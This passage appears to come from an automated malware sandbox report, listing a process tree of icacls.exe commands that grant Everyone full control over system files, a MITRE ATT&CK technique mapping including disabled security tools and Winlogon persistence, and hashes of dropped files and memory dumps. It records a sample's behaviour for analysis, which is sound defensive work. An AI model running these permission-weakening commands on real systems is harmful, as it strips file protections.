  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1976
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe.appx /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4284
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe_License.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4948

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
f9f57d98b4cac7267357cdff675f7b25

SHA1
03132d95389bc3ce4f1ce6ab3e3ff431496ee352

SHA256
0296e45cee5c419f325d3be61e662b07782afa4e03b34e5b59c671d3919c2b59

SHA512
c252fe6a7f37ab447593328a1a45f515bcdcde384f231ca6cb54a05ea4d08c169db1a322d4738f68c264d21fe675aff611c54feb9aa74a46bf0f9c123a5c44e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
1030beebfe5755359ee2c81a904cb16c

SHA1
0ee287fb46d82fdc304bcb6f2ac5ba4574e6df73

SHA256
fa71d45e83b4e1c315bb5f1c41feccc6850afa190f19476f6b8c466c8e289149

SHA512
b2ed1bca375b764c555a75f76d0ba4bf67d59fa32118b6bec718999c969f6f713e71f22c34e9bcdfd6800307c19e0d1228b537311d0c9e1a750afe85e98f2da7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
07c829912e7b5d810edc78d38171b3ad

SHA1
40ef195c57d14a0e8d8eb1c4d8ae12615fd7d6e3

SHA256
f68c81aa98837fb67ddf0cd4342f549428206161b3deeae9024d16bfdb775666

SHA512
c2f027fb02a9364dfb9e6ffc56f9b40ef679eaffe5de6ad76e3f4201c0cf58b684f1fd787e625fa7dc2c9cf9d932f0704eb6efe00a4311d237a40e337f0e2ab6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
f8bec2f14d3a64622ab36ec8a01cf4d9

SHA1
c559efe91370370bbc18cbe6c0a878f4e19c97a0

SHA256
569f55c42d96c9f1e346d0b8aa1a747ac0a01caff95f869c2541eaa878d77e63

SHA512
f64fc1a965dc1fe7f3210830fc7d3b9c43a3f0671b8866f6906f17e2c3d1e3ab71ced8dd8be62c3caa94510d671e321ce2c78ea73c228f805095df2084bdac9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
13ee576655680426da42f8f36d8b472d

SHA1
5eb0332fe767012d6db42e72ac183edc53f384f7

SHA256
e22d7db996d75559fc88ccaf9e053402b280a7476c2fab8682f450a657edebd1

SHA512
163d2919ba9b17c25c733520475ed85bc7363cf9cb4cbb392af002601e0b39103a1ecbc1a5a45f5ffa9f1cd464b9219c23ddccb48468dad43237c71b94cf44ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
a16a4c3cc973d3345ade3f6babd569cf

SHA1
84cb833a91dba384e150a3cde4d16101c4b30dcb

SHA256
128d2f143b507ef5c72a20b983776c1effdd260c7a16c5998180a66060be4299

SHA512
3407784d2d893fd6693b8a65edf927efbd3a7bcbeacae0ede198223ef6896e1c5a3470699c747da61238433c66f78e841b8cdc0a8d9b4b759351f1335515f0e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
123686e2c8d55beda68331f7985f543d

SHA1
5cdd0ec5f56e454825649a494c86cff2ae4aff26

SHA256
a64e44992a54db49f815f0d00b84b0fdbf47b5e932344b6d5394dcf46653fadf

SHA512
4f46686405b182cf9534576b147c14b6b24c0921c87b9de9511004b0b5854411c85372fa070163be1a5457cad28d91bebc0bc459dc18a4731dc09b237483d31f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
0dd2a3dfbb2df1bbb6a4d56f43f87141

SHA1
97686bfd386301326612eedf55115a829ee2febe

SHA256
9521058fa0c5d7609f2f2cc38b6c4ed6a28a9b9a6fb0ff4a28d7f7db39067ebb

SHA512
564db360b011048475ab614000af3731fedcd59b287f0705e3f332ee835a1192f5efc2646239145bb560eab687e5d09d92374c3f4d7750dbb24d837dc7200865

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
03c5b50e7411f303e94561a6c18ba485

SHA1
f07f595a0dd6f2e9b3477a315ab72d385d1183d1

SHA256
fb5218901a2ee37a2b1ef6c8e7298370de0f27944328003480d6fe2e9deff61b

SHA512
a7f2340f756e1dfa1a72de14089087082b620b569a7a6c3ebc6db9afb5f581c3ef561a400c3d92e7d6b6549e338dd8620330579c06dbe2a1fb1b4c61324290f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
c4c5f390397c1ec908dde34683f2009b

SHA1
c42418ccbb361ad36d84b15616eea1cfb4e5589b

SHA256
c80f4a66e02f2e50fecd9b40eafd6587393da79f97bb21e72cdfff0c1442c59f

SHA512
45f4a515cbb72a5a0afdc0730f3c2e5ef00b837682a9a7efc6062faf85d43685d02bdce954115fddeca157b3c04da68005d986ca181ce96ba703d080c9449256

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
c1b463dc56429f64bf793c90bb81fa6c

SHA1
01fe5c60aa6654a7ea8f0f0cf15343b5521958cb

SHA256
f5632f566d8107977a25bf73a2cef7f2e7dae94844b36653c2101e78ad167826

SHA512
bcafac6e0ca9f19f132d5605fcb2757323809d229b6dde0af2031ece84b04cf50c9983337bed39119c8854760d44ec6c2c1bdf04f8db2c85a40355e0caa2d06d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
a7dd8c7d134b35effbe60c5e2a063c19

SHA1
260702a5d438b457bab48f7c31c261b0b206e255

SHA256
b24c579ece53821215651069caff5aa057c9e2b2faedcc68b333c07820a8f075

SHA512
68df996d09a8ba0b5973a6cb793567fc4f0cbab1e364fa5017d337cbd6963300d2511438f299900f90978e95c355ecc03234a36ab8d72a9f17e26fcaa420eecb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
a7dd8c7d134b35effbe60c5e2a063c19

SHA1
260702a5d438b457bab48f7c31c261b0b206e255

SHA256
b24c579ece53821215651069caff5aa057c9e2b2faedcc68b333c07820a8f075

SHA512
68df996d09a8ba0b5973a6cb793567fc4f0cbab1e364fa5017d337cbd6963300d2511438f299900f90978e95c355ecc03234a36ab8d72a9f17e26fcaa420eecb

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8137.bat

MD5
1af2c796c268a8160d0d93e8866dc7b0

SHA1
6d786ee5bf9cb9b1da115ce6daffe1e7b5ef988f

SHA256
94e31962442ee5f22c9ff8f6539c214dabf49e1b672a91cb042e2c0c1369abc8

SHA512
af10c10ef2c7f976ebc52201d17c95cb2a5c433d39c7d722b0c1f56cb48fa27c07cf60e7de8c2d9974f6594212eb02568007da90e49ba3bca226efbe8943271e

Download Submit
C:\Users\Admin\AppData\Local\Temp\v.txt

MD5
df74b18ba34703e91bb50f449b1a3390

SHA1
838a9af1292bccbbead183c3f19bfbb11f807c5a

SHA256
beec45dd1dca1b562ca7ca77a1042cf2ecda5747dbaa3d68feddd61a669db38c

SHA512
57ee76e07aa9fe4ebd56c4639d407a681d7bf8a01d81abc578a703356f1400c158dfe3fe4e9a246b422aec3fdae34f6b3942554d4005b019924f277723f72315

Download Submit
memory/620-116-0x000000001AD80000-0x000000001AD82000-memory.dmp

Filesize
8KB

Download
memory/620-114-0x0000000000100000-0x0000000000101000-memory.dmp

Filesize
4KB

Download
memory/916-271-0x0000000000000000-mapping.dmp

Download
memory/976-260-0x0000000000000000-mapping.dmp

Download
memory/1164-282-0x0000000000000000-mapping.dmp

Download
memory/1184-250-0x0000000000000000-mapping.dmp

Download
memory/1184-234-0x0000000000000000-mapping.dmp

Download
memory/1232-242-0x0000000000000000-mapping.dmp

Download
memory/1232-256-0x0000000000000000-mapping.dmp

Download
memory/1324-266-0x0000000000000000-mapping.dmp

Download
memory/1344-288-0x0000000000000000-mapping.dmp

Download
memory/1496-289-0x0000000000000000-mapping.dmp

Download
memory/1496-265-0x0000000000000000-mapping.dmp

Download
memory/1704-254-0x0000000000000000-mapping.dmp

Download
memory/1736-201-0x000001C8696E3000-0x000001C8696E5000-memory.dmp

Filesize
8KB

Download
memory/1736-224-0x000001C8696E6000-0x000001C8696E8000-memory.dmp

Filesize
8KB

Download
memory/1736-155-0x0000000000000000-mapping.dmp

Download
memory/1736-247-0x000001C8696E8000-0x000001C8696E9000-memory.dmp

Filesize
4KB

Download
memory/1736-199-0x000001C8696E0000-0x000001C8696E2000-memory.dmp

Filesize
8KB

Download
memory/2028-221-0x0000016C3AD76000-0x0000016C3AD78000-memory.dmp

Filesize
8KB

Download
memory/2028-230-0x0000016C3AD78000-0x0000016C3AD79000-memory.dmp

Filesize
4KB

Download
memory/2028-153-0x0000000000000000-mapping.dmp

Download
memory/2028-167-0x0000016C3AD73000-0x0000016C3AD75000-memory.dmp

Filesize
8KB

Download
memory/2028-164-0x0000016C3AD70000-0x0000016C3AD72000-memory.dmp

Filesize
8KB

Download
memory/2104-258-0x00000288A5468000-0x00000288A5469000-memory.dmp

Filesize
4KB

Download
memory/2104-207-0x00000288A5463000-0x00000288A5465000-memory.dmp

Filesize
8KB

Download
memory/2104-161-0x0000000000000000-mapping.dmp

Download
memory/2104-227-0x00000288A5466000-0x00000288A5468000-memory.dmp

Filesize
8KB

Download
memory/2104-206-0x00000288A5460000-0x00000288A5462000-memory.dmp

Filesize
8KB

Download
memory/2248-209-0x000001B77F1A3000-0x000001B77F1A5000-memory.dmp

Filesize
8KB

Download
memory/2248-170-0x0000000000000000-mapping.dmp

Download
memory/2248-208-0x000001B77F1A0000-0x000001B77F1A2000-memory.dmp

Filesize
8KB

Download
memory/2248-231-0x000001B77F1A6000-0x000001B77F1A8000-memory.dmp

Filesize
8KB

Download
memory/2248-261-0x000001B77F1A8000-0x000001B77F1A9000-memory.dmp

Filesize
4KB

Download
memory/2260-304-0x0000000000000000-mapping.dmp

Download
memory/2272-215-0x000001D688F83000-0x000001D688F85000-memory.dmp

Filesize
8KB

Download
memory/2272-239-0x000001D688F86000-0x000001D688F88000-memory.dmp

Filesize
8KB

Download
memory/2272-183-0x0000000000000000-mapping.dmp

Download
memory/2272-264-0x000001D688F88000-0x000001D688F89000-memory.dmp

Filesize
4KB

Download
memory/2272-197-0x000001D688F80000-0x000001D688F82000-memory.dmp

Filesize
8KB

Download
memory/2340-228-0x0000000000000000-mapping.dmp

Download
memory/2472-294-0x0000000000000000-mapping.dmp

Download
memory/2732-267-0x0000000000000000-mapping.dmp

Download
memory/3784-198-0x0000015965CB3000-0x0000015965CB5000-memory.dmp

Filesize
8KB

Download
memory/3784-218-0x0000015965CB6000-0x0000015965CB8000-memory.dmp

Filesize
8KB

Download
memory/3784-154-0x0000000000000000-mapping.dmp

Download
memory/3784-232-0x0000015965CB8000-0x0000015965CB9000-memory.dmp

Filesize
4KB

Download
memory/3784-196-0x0000015965CB0000-0x0000015965CB2000-memory.dmp

Filesize
8KB

Download
memory/3812-233-0x000002DCDAFB6000-0x000002DCDAFB8000-memory.dmp

Filesize
8KB

Download
memory/3812-211-0x000002DCDAFB3000-0x000002DCDAFB5000-memory.dmp

Filesize
8KB

Download
memory/3812-262-0x000002DCDAFB8000-0x000002DCDAFB9000-memory.dmp

Filesize
4KB

Download
memory/3812-210-0x000002DCDAFB0000-0x000002DCDAFB2000-memory.dmp

Filesize
8KB

Download
memory/3812-177-0x0000000000000000-mapping.dmp

Download
memory/3836-128-0x000001A6CE0E3000-0x000001A6CE0E5000-memory.dmp

Filesize
8KB

Download
memory/3836-127-0x000001A6CE0E0000-0x000001A6CE0E2000-memory.dmp

Filesize
8KB

Download
memory/3836-126-0x000001A6CED10000-0x000001A6CED11000-memory.dmp

Filesize
4KB

Download
memory/3836-122-0x000001A6CE070000-0x000001A6CE071000-memory.dmp

Filesize
4KB

Download
memory/3836-117-0x0000000000000000-mapping.dmp

Download
memory/3836-151-0x000001A6CE0E6000-0x000001A6CE0E8000-memory.dmp

Filesize
8KB

Download
memory/3976-300-0x0000000000000000-mapping.dmp

Download
memory/3984-252-0x000001FB68EE8000-0x000001FB68EE9000-memory.dmp

Filesize
4KB

Download
memory/3984-205-0x000001FB68EE3000-0x000001FB68EE5000-memory.dmp

Filesize
8KB

Download
memory/3984-202-0x000001FB68EE0000-0x000001FB68EE2000-memory.dmp

Filesize
8KB

Download
memory/3984-225-0x000001FB68EE6000-0x000001FB68EE8000-memory.dmp

Filesize
8KB

Download
memory/3984-158-0x0000000000000000-mapping.dmp

Download
memory/4132-226-0x0000000000000000-mapping.dmp

Download
memory/4132-292-0x0000000000000000-mapping.dmp

Download
memory/4144-302-0x0000000000000000-mapping.dmp

Download
memory/4172-296-0x0000000000000000-mapping.dmp

Download
memory/4180-263-0x00000174F6898000-0x00000174F6899000-memory.dmp

Filesize
4KB

Download
memory/4180-204-0x00000174F6893000-0x00000174F6895000-memory.dmp

Filesize
8KB

Download
memory/4180-203-0x00000174F6890000-0x00000174F6892000-memory.dmp

Filesize
8KB

Download
memory/4180-194-0x0000000000000000-mapping.dmp

Download
memory/4180-241-0x00000174F6896000-0x00000174F6898000-memory.dmp

Filesize
8KB

Download
memory/4204-290-0x0000000000000000-mapping.dmp

Download
memory/4216-253-0x0000000000000000-mapping.dmp

Download
memory/4240-293-0x0000000000000000-mapping.dmp

Download
memory/4308-298-0x0000000000000000-mapping.dmp

Download
memory/4316-303-0x0000000000000000-mapping.dmp

Download
memory/4328-245-0x00000225B1886000-0x00000225B1888000-memory.dmp

Filesize
8KB

Download
memory/4328-213-0x00000225B1880000-0x00000225B1882000-memory.dmp

Filesize
8KB

Download
memory/4328-214-0x00000225B1883000-0x00000225B1885000-memory.dmp

Filesize
8KB

Download
memory/4328-200-0x0000000000000000-mapping.dmp

Download
memory/4328-274-0x00000225B1888000-0x00000225B1889000-memory.dmp

Filesize
4KB

Download
memory/4336-243-0x0000000000000000-mapping.dmp

Download
memory/4344-251-0x0000000000000000-mapping.dmp

Download
memory/4372-291-0x0000000000000000-mapping.dmp

Download
memory/4380-269-0x0000000000000000-mapping.dmp

Download
memory/4452-309-0x0000014725BB6000-0x0000014725BB8000-memory.dmp

Filesize
8KB

Download
memory/4452-308-0x0000014725BB0000-0x0000014725BB2000-memory.dmp

Filesize
8KB

Download
memory/4452-278-0x0000000000000000-mapping.dmp

Download
memory/4452-310-0x0000014725BB3000-0x0000014725BB5000-memory.dmp

Filesize
8KB

Download
memory/4476-273-0x0000024230228000-0x0000024230229000-memory.dmp

Filesize
4KB

Download
memory/4476-212-0x0000000000000000-mapping.dmp

Download
memory/4476-219-0x0000024230220000-0x0000024230222000-memory.dmp

Filesize
8KB

Download
memory/4476-220-0x0000024230223000-0x0000024230225000-memory.dmp

Filesize
8KB

Download
memory/4476-246-0x0000024230226000-0x0000024230228000-memory.dmp

Filesize
8KB

Download
memory/4484-295-0x0000000000000000-mapping.dmp

Download
memory/4484-238-0x0000000000000000-mapping.dmp

Download
memory/4508-255-0x0000000000000000-mapping.dmp

Download
memory/4540-285-0x0000000000000000-mapping.dmp

Download
memory/4584-299-0x0000000000000000-mapping.dmp

Download
memory/4588-283-0x0000000000000000-mapping.dmp

Download
memory/4600-223-0x00000224C2613000-0x00000224C2615000-memory.dmp

Filesize
8KB

Download
memory/4600-216-0x0000000000000000-mapping.dmp

Download
memory/4600-272-0x00000224C2618000-0x00000224C2619000-memory.dmp

Filesize
4KB

Download
memory/4600-248-0x00000224C2616000-0x00000224C2618000-memory.dmp

Filesize
8KB

Download
memory/4600-222-0x00000224C2610000-0x00000224C2612000-memory.dmp

Filesize
8KB

Download
memory/4644-306-0x0000000000000000-mapping.dmp

Download
memory/4684-305-0x0000000000000000-mapping.dmp

Download
memory/4716-217-0x0000000000000000-mapping.dmp

Download
memory/4740-244-0x0000000000000000-mapping.dmp

Download
memory/4744-301-0x0000000000000000-mapping.dmp

Download
memory/4756-229-0x0000000000000000-mapping.dmp

Download
memory/4756-249-0x0000000000000000-mapping.dmp

Download
memory/4764-235-0x0000000000000000-mapping.dmp

Download
memory/4800-297-0x0000000000000000-mapping.dmp

Download
memory/4848-240-0x0000000000000000-mapping.dmp

Download
memory/4928-237-0x0000000000000000-mapping.dmp

Download
memory/4992-236-0x0000000000000000-mapping.dmp

Download
memory/5092-275-0x0000000000000000-mapping.dmp

Download
memory/5108-277-0x0000000000000000-mapping.dmp

Download